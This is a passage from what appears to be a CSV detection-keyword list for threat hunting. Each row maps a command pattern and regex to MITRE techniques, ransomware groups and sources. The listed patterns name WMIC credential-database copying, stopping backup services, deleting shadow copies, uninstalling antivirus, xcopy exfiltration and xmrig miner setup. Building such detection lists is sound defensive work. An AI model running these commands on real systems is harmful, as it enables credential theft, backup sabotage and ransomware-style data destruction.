full*",".{0,1000}wmic\sprocess\scall\screate.{0,1000}ntdsutil\s.{0,1000}ac\si\sntds.{0,1000}\sifm.{0,1000}create\sfull.{0,1000}","greyware_tool_keyword","wmic","The actor has executed WMIC commands [T1047] to create a copy of the ntds.dit file and SYSTEM registry hive using ntdsutil.exe","T1047 - T1005 - T1567.001","TA0002 - TA0003 - TA0007","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Credential Access","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*wmic process get commandline 
-all*",".{0,1000}wmic\sprocess\sget\scommandline\s\-all.{0,1000}","greyware_tool_keyword","wmic","list all running processes and their command lines on a Windows system","T1057 - T1082 - T1518","TA0007 - TA0009","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Discovery","https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a","1","0","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*wmic product where ""name like '%Malwarebytes%'"" call uninstall /nointeractive*",".{0,1000}wmic\sproduct\swhere\s\""name\slike\s\'\%Malwarebytes\%\'\""\scall\suninstall\s\/nointeractive.{0,1000}","greyware_tool_keyword","wmic","uninstall Malwarebytes","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*wmic product where ""name like 'Malwarebytes%'"" call uninstall /nointeractive*",".{0,1000}wmic\sproduct\swhere\s\""name\slike\s\'Malwarebytes\%\'\""\scall\suninstall\s\/nointeractive.{0,1000}","greyware_tool_keyword","wmic","uninstall Malwarebytes","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*wmic service brief*",".{0,1000}wmic\sservice\sbrief.{0,1000}","greyware_tool_keyword","wmic","wmic discovery commands abused by attackers","T1007","TA0007 ","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Discovery","N/A","1","0","N/A","greyware tool - risks of False positive !","N/A","4","N/A","N/A","N/A","N/A" "*wmic service where ""name like '%veeam%'"" call stopservice*",".{0,1000}wmic\sservice\swhere\s\""name\slike\s\'\%veeam\%\'\""\scall\sstopservice.{0,1000}","greyware_tool_keyword","wmic","stopping backup service","T1562.002 - T1489","TA0005 - TA0040","N/A","MAZE - 
Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*wmic service where ""name like 'acronisagent%'"" call stopservice*",".{0,1000}wmic\sservice\swhere\s\""name\slike\s\'acronisagent\%\'\""\scall\sstopservice.{0,1000}","greyware_tool_keyword","wmic","stopping backup service","T1562.002 - T1489","TA0005 - TA0040","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*wmic service where ""name like 'acrsch2svc%'"" call stopservice*",".{0,1000}wmic\sservice\swhere\s\""name\slike\s\'acrsch2svc\%\'\""\scall\sstopservice.{0,1000}","greyware_tool_keyword","wmic","stopping backup service","T1562.002 - T1489","TA0005 - TA0040","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*wmic service where ""name like 'agntsvc%'"" call stopservice*",".{0,1000}wmic\sservice\swhere\s\""name\slike\s\'agntsvc\%\'\""\scall\sstopservice.{0,1000}","greyware_tool_keyword","wmic","stopping backup service","T1562.002 - T1489","TA0005 - TA0040","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*wmic service 
where ""name like 'arsm%'"" call stopservice*",".{0,1000}wmic\sservice\swhere\s\""name\slike\s\'arsm\%\'\""\scall\sstopservice.{0,1000}","greyware_tool_keyword","wmic","stopping backup service","T1562.002 - T1489","TA0005 - TA0040","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*wmic service where ""name like 'backp%'"" call stopservice*",".{0,1000}wmic\sservice\swhere\s\""name\slike\s\'backp\%\'\""\scall\sstopservice.{0,1000}","greyware_tool_keyword","wmic","stopping backup service","T1562.002 - T1489","TA0005 - TA0040","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*wmic service where ""name like 'backup%'"" call stopservice*",".{0,1000}wmic\sservice\swhere\s\""name\slike\s\'backup\%\'\""\scall\sstopservice.{0,1000}","greyware_tool_keyword","wmic","stopping backup service","T1562.002 - T1489","TA0005 - TA0040","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*wmic service where ""name like 'cbservi%'"" call stopservice*",".{0,1000}wmic\sservice\swhere\s\""name\slike\s\'cbservi\%\'\""\scall\sstopservice.{0,1000}","greyware_tool_keyword","wmic","stopping backup service","T1562.002 - T1489","TA0005 - TA0040","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Defense 
Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*wmic service where ""name like 'cbvscserv%'"" call stopservice*",".{0,1000}wmic\sservice\swhere\s\""name\slike\s\'cbvscserv\%\'\""\scall\sstopservice.{0,1000}","greyware_tool_keyword","wmic","stopping backup service","T1562.002 - T1489","TA0005 - TA0040","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*wmic service where ""name like 'shadowprotectsvc%'"" call stopservice*",".{0,1000}wmic\sservice\swhere\s\""name\slike\s\'shadowprotectsvc\%\'\""\scall\sstopservice.{0,1000}","greyware_tool_keyword","wmic","stopping backup service","T1562.002 - T1489","TA0005 - TA0040","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*wmic service where ""name like 'spxservice%'"" call stopservice*",".{0,1000}wmic\sservice\swhere\s\""name\slike\s\'spxservice\%\'\""\scall\sstopservice.{0,1000}","greyware_tool_keyword","wmic","stopping backup service","T1562.002 - T1489","TA0005 - TA0040","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*wmic service where ""name like 'sqbcoreservice%'"" call 
stopservice*",".{0,1000}wmic\sservice\swhere\s\""name\slike\s\'sqbcoreservice\%\'\""\scall\sstopservice.{0,1000}","greyware_tool_keyword","wmic","stopping backup service","T1562.002 - T1489","TA0005 - TA0040","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*wmic service where ""name like 'stc_endpt_svc%'"" call stopservice*",".{0,1000}wmic\sservice\swhere\s\""name\slike\s\'stc_endpt_svc\%\'\""\scall\sstopservice.{0,1000}","greyware_tool_keyword","wmic","stopping backup service","T1562.002 - T1489","TA0005 - TA0040","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*wmic service where ""name like 'storagecraft imagemanager%'"" call stopservice*",".{0,1000}wmic\sservice\swhere\s\""name\slike\s\'storagecraft\simagemanager\%\'\""\scall\sstopservice.{0,1000}","greyware_tool_keyword","wmic","stopping backup service","T1562.002 - T1489","TA0005 - TA0040","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*wmic service where ""name like 'veeam%'"" call stopservice*",".{0,1000}wmic\sservice\swhere\s\""name\slike\s\'veeam\%\'\""\scall\sstopservice.{0,1000}","greyware_tool_keyword","wmic","stopping backup service","T1562.002 - T1489","TA0005 - TA0040","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - 
AvosLocker","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*wmic service where ""name like 'vsnapvss%'"" call stopservice*",".{0,1000}wmic\sservice\swhere\s\""name\slike\s\'vsnapvss\%\'\""\scall\sstopservice.{0,1000}","greyware_tool_keyword","wmic","stopping backup service","T1562.002 - T1489","TA0005 - TA0040","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*wmic service where ""name like 'vssvc%'"" call stopservice*",".{0,1000}wmic\sservice\swhere\s\""name\slike\s\'vssvc\%\'\""\scall\sstopservice.{0,1000}","greyware_tool_keyword","wmic","stopping backup service","T1562.002 - T1489","TA0005 - TA0040","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*wmic service where ""name like 'wbengine%'"" call stopservice*",".{0,1000}wmic\sservice\swhere\s\""name\slike\s\'wbengine\%\'\""\scall\sstopservice.{0,1000}","greyware_tool_keyword","wmic","stopping backup service","T1562.002 - T1489","TA0005 - TA0040","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*wmic SHADOWCOPY 
/nointeractive*",".{0,1000}wmic\sSHADOWCOPY\s\/nointeractive.{0,1000}","greyware_tool_keyword","wmic","VSS is a feature in Windows that allows for the creation of snapshots of a volume capturing its state at a specific point in time. Adversaries may abuse the wmic shadowcopy command to interact with these shadow copies for defense evasion purposes.","T1490 - T1562.002","TA0040 - TA0007","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*wmic shadowcopy delete*",".{0,1000}wmic\sshadowcopy\sdelete.{0,1000}","greyware_tool_keyword","wmic","VSS is a feature in Windows that allows for the creation of snapshots of a volume capturing its state at a specific point in time. Adversaries may abuse the wmic shadowcopy command to interact with these shadow copies for defense evasion purposes.","T1490 - T1562.002","TA0040 - TA0007","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*wmic useraccount get /ALL /format:csv*",".{0,1000}wmic\suseraccount\sget\s\/ALL\s\/format\:csv.{0,1000}","greyware_tool_keyword","wmic","User Enumeration","T1087 - T1033","TA0006","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Reconnaissance","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Anti-Forensics.md","1","0","N/A","N/A","10","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z" "*wmic volume list brief*",".{0,1000}wmic\svolume\slist\sbrief.{0,1000}","greyware_tool_keyword","wmic","wmic discovery commands abused by attackers","T1082","TA0007 ","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Discovery","N/A","1","0","N/A","greyware tool - risks of False positive !","N/A","4","N/A","N/A","N/A","N/A" "*wmic*/Namespace:\\root\SecurityCenter2 
Path AntiVirusProduct Get displayName*",".{0,1000}wmic.{0,1000}\/Namespace\:\\\\root\\SecurityCenter2\sPath\sAntiVirusProduct\sGet\sdisplayName.{0,1000}","greyware_tool_keyword","wmic","list AV products with wmic","T1518.001 - T1082","TA0007 - TA0005","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Discovery","N/A","1","0","N/A","greyware tool - risks of False positive !","2","9","N/A","N/A","N/A","N/A" "*wmic.exe process call create *.txt:*.exe*",".{0,1000}wmic\.exe\sprocess\scall\screate\s.{0,1000}\.txt\:.{0,1000}\.exe.{0,1000}","greyware_tool_keyword","wmic","Execute a .EXE file stored as an Alternate Data Stream (ADS)","T1105 - T1027.001 - T1096 - T1036","TA0002 - TA0008","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Defense Evasion","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Anti-Forensics.md","1","0","N/A","N/A","N/A","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z" "*wmic.exe process call create *cmd /c *",".{0,1000}wmic\.exe\sprocess\scall\screate\s.{0,1000}cmd\s\/c\s.{0,1000}","greyware_tool_keyword","wmic","call cmd.exe with wmic","T1047 - T1059","TA0002 - TA0009","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Collection","N/A","1","0","N/A","greyware tool - risks of False positive !","5","10","N/A","N/A","N/A","N/A" "*wmic.exe SHADOWCOPY /nointeractive*",".{0,1000}wmic\.exe\sSHADOWCOPY\s\/nointeractive.{0,1000}","greyware_tool_keyword","wmic","VSS is a feature in Windows that allows for the creation of snapshots of a volume capturing its state at a specific point in time. 
Adversaries may abuse the wmic shadowcopy command to interact with these shadow copies for defense evasion purposes.","T1490 - T1562.002","TA0040 - TA0007","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*wmic.exe shadowcopy delete*",".{0,1000}wmic\.exe\sshadowcopy\sdelete.{0,1000}","greyware_tool_keyword","wmic","VSS is a feature in Windows that allows for the creation of snapshots of a volume capturing its state at a specific point in time. Adversaries may abuse the wmic shadowcopy command to interact with these shadow copies for defense evasion purposes.","T1490 - T1562.002","TA0040 - TA0005","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*WMIC.exe shadowcopy where *ID=* delete*",".{0,1000}WMIC\.exe\sshadowcopy\swhere\s.{0,1000}ID\=.{0,1000}\sdelete.{0,1000}","greyware_tool_keyword","wmic","VSS is a feature in Windows that allows for the creation of snapshots of a volume capturing its state at a specific point in time. 
Adversaries may abuse the wmic shadowcopy command to interact with these shadow copies for defense evasion purposes.","T1490 - T1562.002","TA0040 - TA0005","N/A","MAZE - Conti - Hive - Quantum - TargetCompany - PYSA - AvosLocker","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*mhngpdlhojliikfknhfaglpnddniijfh*",".{0,1000}mhngpdlhojliikfknhfaglpnddniijfh.{0,1000}","greyware_tool_keyword","WorkingVPN","External VPN usage within corporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "*cmd /c xcopy /s /i /h /e /q /y /d*",".{0,1000}cmd\s\/c\sxcopy\s\/s\s\/i\s\/h\s\/e\s\/q\s\/y\s\/d.{0,1000}","greyware_tool_keyword","xcopy","command used by Doina trojan","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Data Exfiltration","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*xcopy c:\* \\*\c$*",".{0,1000}xcopy\sc\:\\.{0,1000}\s\\\\.{0,1000}\\c\$.{0,1000}","greyware_tool_keyword","xcopy","command abused by attackers - exfiltration to remote host with xcopy","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Data Exfiltration","N/A","1","0","N/A","greyware_tools high risks of false positives","N/A","6","N/A","N/A","N/A","N/A" "* xmrig.exe*",".{0,1000}\s\sxmrig\.exe.{0,1000}","greyware_tool_keyword","xmrig","Auto setup scripts and pre-compiled xmr miner for 
c3pool.com pool","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/C3Pool/xmrig_setup/","1","0","N/A","N/A","9","1","26","21","2024-08-14T20:28:06Z","2020-05-16T13:01:30Z" "* c3pool_miner*",".{0,1000}\sc3pool_miner.{0,1000}","greyware_tool_keyword","xmrig","Auto setup scripts and pre-compiled xmr miner for c3pool.com pool","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/C3Pool/xmrig_setup/","1","0","N/A","N/A","9","1","26","21","2024-08-14T20:28:06Z","2020-05-16T13:01:30Z" "* --coin *--nicehash *",".{0,1000}\s\-\-coin\s.{0,1000}\-\-nicehash\s.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","N/A","9","10","8590","3428","2024-08-29T12:50:43Z","2017-04-15T05:57:53Z" "* --coin=monero*",".{0,1000}\s\-\-coin\=monero.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","N/A","9","10","8590","3428","2024-08-29T12:50:43Z","2017-04-15T05:57:53Z" "* --config=*c3pool*config_background.json*",".{0,1000}\s\-\-config\=.{0,1000}c3pool.{0,1000}config_background\.json.{0,1000}","greyware_tool_keyword","xmrig","Auto setup scripts and pre-compiled xmr miner for c3pool.com pool","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/C3Pool/xmrig_setup/","1","0","N/A","N/A","9","1","26","21","2024-08-14T20:28:06Z","2020-05-16T13:01:30Z" "* --donate-level=*",".{0,1000}\s\-\-donate\-level\=.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - 
TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","N/A","9","10","8590","3428","2024-08-29T12:50:43Z","2017-04-15T05:57:53Z" "* install c3pool_miner *",".{0,1000}\sinstall\sc3pool_miner\s.{0,1000}","greyware_tool_keyword","xmrig","Auto setup scripts and pre-compiled xmr miner for c3pool.com pool","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/C3Pool/xmrig_setup/","1","0","N/A","N/A","9","1","26","21","2024-08-14T20:28:06Z","2020-05-16T13:01:30Z" "* --nicehash *--coin *",".{0,1000}\s\-\-nicehash\s.{0,1000}\-\-coin\s.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","N/A","9","10","8590","3428","2024-08-29T12:50:43Z","2017-04-15T05:57:53Z" "* set xmrig Type SERVICE_WIN32_OWN_PROCESS*",".{0,1000}\sset\sxmrig\sType\sSERVICE_WIN32_OWN_PROCESS.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A" "*%USERPROFILE%\\nssm.zip*",".{0,1000}\%USERPROFILE\%\\\\nssm\.zip.{0,1000}","greyware_tool_keyword","xmrig","Auto setup scripts and pre-compiled xmr miner for c3pool.com pool","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/C3Pool/xmrig_setup/","1","0","N/A","N/A","9","1","26","21","2024-08-14T20:28:06Z","2020-05-16T13:01:30Z" "*/xmrig-*-gcc-win64.zip*",".{0,1000}\/xmrig\-.{0,1000}\-gcc\-win64\.zip.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - 
TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","N/A","9","10","8590","3428","2024-08-29T12:50:43Z","2017-04-15T05:57:53Z" "*/xmrig.exe*",".{0,1000}\/xmrig\.exe.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","N/A","9","10","8590","3428","2024-08-29T12:50:43Z","2017-04-15T05:57:53Z" "*/xmrig.git*",".{0,1000}\/xmrig\.git.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","N/A","9","10","8590","3428","2024-08-29T12:50:43Z","2017-04-15T05:57:53Z" "*\c3pool\\miner.bat*",".{0,1000}\\c3pool\\\\miner\.bat.{0,1000}","greyware_tool_keyword","xmrig","Auto setup scripts and pre-compiled xmr miner for c3pool.com pool","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/C3Pool/xmrig_setup/","1","0","N/A","N/A","9","1","26","21","2024-08-14T20:28:06Z","2020-05-16T13:01:30Z" "*\c3pool\config.json*",".{0,1000}\\c3pool\\config\.json.{0,1000}","greyware_tool_keyword","xmrig","Auto setup scripts and pre-compiled xmr miner for c3pool.com pool","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/C3Pool/xmrig_setup/","1","0","N/A","N/A","9","1","26","21","2024-08-14T20:28:06Z","2020-05-16T13:01:30Z" "*\WinRing0x64.sys*",".{0,1000}\\WinRing0x64\.sys.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","image loaded","9","10","8590","3428","2024-08-29T12:50:43Z","2017-04-15T05:57:53Z" 
"*\xmrig-*-gcc-win64.zip*",".{0,1000}\\xmrig\-.{0,1000}\-gcc\-win64\.zip.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","N/A","9","10","8590","3428","2024-08-29T12:50:43Z","2017-04-15T05:57:53Z" "*\xmrig.exe*",".{0,1000}\\xmrig\.exe.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","N/A","9","10","8590","3428","2024-08-29T12:50:43Z","2017-04-15T05:57:53Z" "*\xmrig.log*",".{0,1000}\\xmrig\.log.{0,1000}","greyware_tool_keyword","xmrig","Auto setup scripts and pre-compiled xmr miner for c3pool.com pool","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/C3Pool/xmrig_setup/","1","0","N/A","N/A","9","1","26","21","2024-08-14T20:28:06Z","2020-05-16T13:01:30Z" "*\xmrig_setup\*",".{0,1000}\\xmrig_setup\\.{0,1000}","greyware_tool_keyword","xmrig","Auto setup scripts and pre-compiled xmr miner for c3pool.com pool","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/C3Pool/xmrig_setup/","1","0","N/A","N/A","9","1","26","21","2024-08-14T20:28:06Z","2020-05-16T13:01:30Z" "*\xmrig-6.20.0*",".{0,1000}\\xmrig\-6\.20\.0.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","N/A","9","10","8590","3428","2024-08-29T12:50:43Z","2017-04-15T05:57:53Z" "*\xmrig-master*",".{0,1000}\\xmrig\-master.{0,1000}","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - 
TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","N/A","9","10","8590","3428","2024-08-29T12:50:43Z","2017-04-15T05:57:53Z" "*] Creating c3pool_miner service*",".{0,1000}\]\sCreating\sc3pool_miner\sservice.{0,1000}","greyware_tool_keyword","xmrig","Auto setup scripts and pre-compiled xmr miner for c3pool.com pool","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/C3Pool/xmrig_setup/","1","0","N/A","N/A","9","1","26","21","2024-08-14T20:28:06Z","2020-05-16T13:01:30Z" "*] Looking for the latest version of Monero miner*",".{0,1000}\]\sLooking\sfor\sthe\slatest\sversion\sof\sMonero\sminer.{0,1000}","greyware_tool_keyword","xmrig","Auto setup scripts and pre-compiled xmr miner for c3pool.com pool","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/C3Pool/xmrig_setup/","1","0","N/A","N/A","9","1","26","21","2024-08-14T20:28:06Z","2020-05-16T13:01:30Z" "*] Removing previous c3pool miner *",".{0,1000}\]\sRemoving\sprevious\sc3pool\sminer\s.{0,1000}","greyware_tool_keyword","xmrig","Auto setup scripts and pre-compiled xmr miner for c3pool.com pool","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/C3Pool/xmrig_setup/","1","0","N/A","N/A","9","1","26","21","2024-08-14T20:28:06Z","2020-05-16T13:01:30Z" "*] Running miner in the 